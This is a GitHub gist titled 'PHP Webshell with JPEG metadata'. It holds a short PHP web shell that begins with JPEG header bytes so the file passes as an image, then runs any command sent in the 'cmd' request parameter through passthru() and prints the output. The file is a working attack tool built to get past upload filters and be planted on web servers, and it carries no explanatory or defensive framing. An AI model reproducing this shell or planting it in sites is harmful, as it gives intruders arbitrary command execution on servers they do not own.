Skip to content

Instantly share code, notes, and snippets.

@SleepyLctl
Created March 28, 2018 10:46
Show Gist options
  • Save SleepyLctl/71ace4d64d3134ea5ab5bc0a93d738b6 to your computer and use it in GitHub Desktop.
Save SleepyLctl/71ace4d64d3134ea5ab5bc0a93d738b6 to your computer and use it in GitHub Desktop.
PHP Webshell with JPEG metadata
ÿØÿà
<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment